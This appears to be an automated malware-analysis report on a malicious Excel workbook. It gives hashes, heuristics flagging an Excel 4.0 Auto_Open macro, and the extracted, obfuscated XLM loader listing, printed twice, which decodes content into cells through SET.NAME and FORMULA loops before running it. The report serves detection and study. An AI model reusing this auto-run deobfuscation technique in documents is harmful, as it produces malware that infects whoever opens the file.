Office (OLE) malware analysis — malicious · a02cd10dc17fdcc8

MALICIOUS

Office (OLE)

35.5 KB Created: 2020-11-25 10:42:03 Authoring application: Microsoft Excel First seen: 2021-01-11

MD5: 857e33fb098dcae7faff72d650d4f89b SHA-1: 4409532df5bb19b47bfd1340ff24b95fbdcf8afd SHA-256: a02cd10dc17fdcc829133a4b6eedb6f87776ebf7d3b8afe9ffa0690671c73469

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6359 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6359 bytes
SHA-256: `24b1085115a6a325582e4a8343c7a3e93c5673a69aece249daba56925aea2574`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - uMHP ' 0018 23 LABEL : Cell Value, String Constant - aLpeJmMp len=0 ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C141 ' 0018 23 LABEL : Cell Value, String Constant - bazePtZz len=0 ' 0018 25 LABEL : Cell Value, String Constant - clLabbUEbj len=0 ' 0018 22 LABEL : Cell Value, String Constant - EihMkan len=0 ' 0018 24 LABEL : Cell Value, String Constant - ekhlSAhMx len=0 ' 0018 23 LABEL : Cell Value, String Constant - FbPzkujC len=0 ' 0018 25 LABEL : Cell Value, String Constant - GAoGxktFPx len=0 ' 0018 20 LABEL : Cell Value, String Constant - JqCsS len=0 ' 0018 26 LABEL : Cell Value, String Constant - KCfjWrKXGzB len=0 ' 0018 23 LABEL : Cell Value, String Constant - mFruQhxs len=0 ' 0018 26 LABEL : Cell Value, String Constant - mwETXHPnEQu len=0 ' 0018 24 LABEL : Cell Value, String Constant - OodKzPLff len=0 ' 0018 20 LABEL : Cell Value, String Constant - pCbdH len=0 ' 0018 25 LABEL : Cell Value, String Constant - PpaaIpuTys len=0 ' 0018 20 LABEL : Cell Value, String Constant - pqvAQ len=0 ' 0018 20 LABEL : Cell Value, String Constant - reVDY len=0 ' 0018 21 LABEL : Cell Value, String Constant - SDsOIQ len=0 ' 0018 23 LABEL : Cell Value, String Constant - UYWsaLXj len=0 ' 0018 22 LABEL : Cell Value, String Constant - VUFYSpB len=0 ' 0018 20 LABEL : Cell Value, String Constant - XHdtO len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' uMHP,C62,"SET.NAME("reVDY",VALUE("0"))","" ' uMHP,C64,"SET.NAME("clLabbUEbj",reVDY)","" ' uMHP,C69,"SET.NAME("JqCsS",reVDY)","" ' uMHP,C73,"SET.NAME("VUFYSpB",COUNTA(EihMkan))","" ' uMHP,C75,"SET.NAME("FbPzkujC",COUNTA(aLpeJmMp))","" ' uMHP,C80,[],"" ' uMHP,C83,"SET.NAME("bazePtZz","")","" ' uMHP,C87,"clLabbUEbj","" ' uMHP,C90,"SET.NAME("OodKzPLff",HLOOKUP("",EihMkan,clLabbUEbj,FALSE))","" ' uMHP,C92,"pCbdH","" ' uMHP,C94,"SET.NAME("KCfjWrKXGzB",reVDY)","" ' uMHP,C96,[],"" ' uMHP,C100,"KCfjWrKXGzB","" ' uMHP,C102,"GAoGxktFPx","" ' uMHP,C106,"PpaaIpuTys","" ' uMHP,C109,"ekhlSAhMx","" ' uMHP,C111,"SET.NAME("UYWsaLXj",VALUE(HLOOKUP("",aLpeJmMp,ekhlSAhMx,FALSE)))","" ' uMHP,C113,"SDsOIQ","" ' uMHP,C116,"bazePtZz","" ' uMHP,C118,"JqCsS","" ' uMHP,C121,NEXT(),"" ' uMHP,C125,"pqvAQ","" ' uMHP,C130,"SET.NAME("f",INT(T(FORMULA(T(bazePtZz)&"",""&T(pqvAQ)))))","" ' uMHP,C133,"mFruQhxs","" ' uMHP,C137,NEXT(),"" ' uMHP,C139,RETURN(),"" ' uMHP,C168,"SET.NAME("mwETXHPnEQu",C62)","" ' uMHP,C171,"EihMkan","" ' uMHP,C174,"SET.NAME("aLpeJmMp",R67C13)","" ' uMHP,C176,"SET.NAME("mFruQhxs",185)","" ' uMHP,C181,"SET.NAME("XHdtO",3)","" ' uMHP,C184,mwETXHPnEQu(),"" ' uMHP,C185,HALT(),""

SHA-256: 24b1085115a6a325582e4a8343c7a3e93c5673a69aece249daba56925aea2574

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  uMHP
' 0018     23 LABEL : Cell Value, String Constant - aLpeJmMp len=0 
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C141 
' 0018     23 LABEL : Cell Value, String Constant - bazePtZz len=0 
' 0018     25 LABEL : Cell Value, String Constant - clLabbUEbj len=0 
' 0018     22 LABEL : Cell Value, String Constant - EihMkan len=0 
' 0018     24 LABEL : Cell Value, String Constant - ekhlSAhMx len=0 
' 0018     23 LABEL : Cell Value, String Constant - FbPzkujC len=0 
' 0018     25 LABEL : Cell Value, String Constant - GAoGxktFPx len=0 
' 0018     20 LABEL : Cell Value, String Constant - JqCsS len=0 
' 0018     26 LABEL : Cell Value, String Constant - KCfjWrKXGzB len=0 
' 0018     23 LABEL : Cell Value, String Constant - mFruQhxs len=0 
' 0018     26 LABEL : Cell Value, String Constant - mwETXHPnEQu len=0 
' 0018     24 LABEL : Cell Value, String Constant - OodKzPLff len=0 
' 0018     20 LABEL : Cell Value, String Constant - pCbdH len=0 
' 0018     25 LABEL : Cell Value, String Constant - PpaaIpuTys len=0 
' 0018     20 LABEL : Cell Value, String Constant - pqvAQ len=0 
' 0018     20 LABEL : Cell Value, String Constant - reVDY len=0 
' 0018     21 LABEL : Cell Value, String Constant - SDsOIQ len=0 
' 0018     23 LABEL : Cell Value, String Constant - UYWsaLXj len=0 
' 0018     22 LABEL : Cell Value, String Constant - VUFYSpB len=0 
' 0018     20 LABEL : Cell Value, String Constant - XHdtO len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  uMHP,C62,"SET.NAME("reVDY",VALUE("0"))",""
'  uMHP,C64,"SET.NAME("clLabbUEbj",reVDY)",""
'  uMHP,C69,"SET.NAME("JqCsS",reVDY)",""
'  uMHP,C73,"SET.NAME("VUFYSpB",COUNTA(EihMkan))",""
'  uMHP,C75,"SET.NAME("FbPzkujC",COUNTA(aLpeJmMp))",""
'  uMHP,C80,[],""
'  uMHP,C83,"SET.NAME("bazePtZz","")",""
'  uMHP,C87,"clLabbUEbj",""
'  uMHP,C90,"SET.NAME("OodKzPLff",HLOOKUP("*",EihMkan,clLabbUEbj,FALSE))",""
'  uMHP,C92,"pCbdH",""
'  uMHP,C94,"SET.NAME("KCfjWrKXGzB",reVDY)",""
'  uMHP,C96,[],""
'  uMHP,C100,"KCfjWrKXGzB",""
'  uMHP,C102,"GAoGxktFPx",""
'  uMHP,C106,"PpaaIpuTys",""
'  uMHP,C109,"ekhlSAhMx",""
'  uMHP,C111,"SET.NAME("UYWsaLXj",VALUE(HLOOKUP("*",aLpeJmMp,ekhlSAhMx,FALSE)))",""
'  uMHP,C113,"SDsOIQ",""
'  uMHP,C116,"bazePtZz",""
'  uMHP,C118,"JqCsS",""
'  uMHP,C121,NEXT(),""
'  uMHP,C125,"pqvAQ",""
'  uMHP,C130,"SET.NAME("f",INT(T(FORMULA(T(bazePtZz)&"",""&T(pqvAQ)))))",""
'  uMHP,C133,"mFruQhxs",""
'  uMHP,C137,NEXT(),""
'  uMHP,C139,RETURN(),""
'  uMHP,C168,"SET.NAME("mwETXHPnEQu",C62)",""
'  uMHP,C171,"EihMkan",""
'  uMHP,C174,"SET.NAME("aLpeJmMp",R67C13)",""
'  uMHP,C176,"SET.NAME("mFruQhxs",185)",""
'  uMHP,C181,"SET.NAME("XHdtO",3)",""
'  uMHP,C184,mwETXHPnEQu(),""
'  uMHP,C185,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.